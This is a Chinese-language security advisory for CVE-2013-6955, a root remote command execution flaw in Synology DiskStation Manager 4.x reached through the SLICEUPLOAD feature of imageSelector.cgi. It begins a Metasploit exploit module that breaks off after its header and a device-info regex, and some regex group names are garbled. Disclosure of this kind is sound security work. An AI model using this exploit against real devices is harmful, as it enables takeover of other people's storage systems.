发布日期:2013-12-25
更新日期:2013-12-26
受影响系统:
Synology DiskStation Manager 4.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 64516
CVE(CAN) ID: CVE-2013-6955
Synology DiskStation Manager是可以提供多任务用户接口的NAS操作系统。
Synology DiskStation Manager 4.x版本的/webman/imageSelector.cgi允许附加任意数据到使用 SLICEUPLOAD 功能的文件,在实现上存在安全漏洞,未经身份验证的用户通过发送特制的HTTP请求,利用此漏洞可以root权限执行任意命令。
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
DEVICE_INFO_PATTERN = /major=(?\d+)&minor=(?\d+)&build=(?\d+)
&junior=\d+&unique=synology_\w+_(?[^&]+)/x
def initialize(info={})
super(update_info(info,
'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
'Description' => %q{
This module exploits a vulnerability found in Synology DiskStati